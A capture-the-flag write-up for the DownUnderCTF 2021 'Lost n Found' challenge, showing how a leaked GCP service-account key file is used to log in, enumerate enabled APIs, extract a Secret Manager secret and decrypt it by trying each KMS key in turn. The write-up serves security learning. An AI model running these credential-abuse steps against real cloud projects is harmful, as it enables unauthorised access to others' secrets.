# writeup  
Write up for the `Lost n Found` challenge

## Enumeration #1

Check what we can do with attached file `legacy.json`. Inside this file we can
see there are a credentials for service account in the GCP:  
* service account: `legacy-svc-account@ductf-lost-n-found.iam.gserviceaccount.com`  
* project id: `ductf-lost-n-found`

By using below command we can login to the GCP project `ductf-lost-n-found`

```bash  
gcloud auth activate-service-account --key-file=legacy.json  
gcloud config set project ductf-lost-n-found  
```

## Enumeration #2

Next step is checking all possible resources which we are able to use by above
service account. We used for this enumeration `gcloud` CLI and try to list
resources for all possible parameters. Most of API's in the GCP was disabled
but...

After enumeration we can see only `secrets` and `kms` APIs are enabled in the
`ductf-lost-n-found` project and service account `legacy-svc-account@ductf-
lost-n-found.iam.gserviceaccount.com` has an access to this resources.

## Enumaration #3

Based on `Enumeration #2` research we can extract secret to the `secret_enc`
file and save all available keys.

```bash  
gcloud secrets list  
gcloud secrets versions access latest --secret="unused_data" |base64 -d
>secret_enc  
gcloud kms keyrings list --location australia-southeast2 # we know CTF is
played in Australia  
gcloud kms keys list --keyring projects/ductf-lost-n-
found/locations/australia-southeast2/keyRings/wardens-locks |tail -n +2 |awk
'{ print $1 }' |sed 's/^.*cryptoKeys\///g' >keys  
```

## Check the final flag

Now we have `keys` file with the list of all available keys and `secret_enc`
file with the secret in the encrypted form, so we can try to use one of the
key to decrypt the secret.

```bash  
while read line; do gcloud kms decrypt --key $line --ciphertext-
file=secret_enc --plaintext-file=secret_dec --location australia-southeast2
--keyring=wardens-locks; done

Original writeup
(https://github.com/flusive/writeups/blob/main/DownUnderCTF2021/Lost-n-
Found/writeup.md).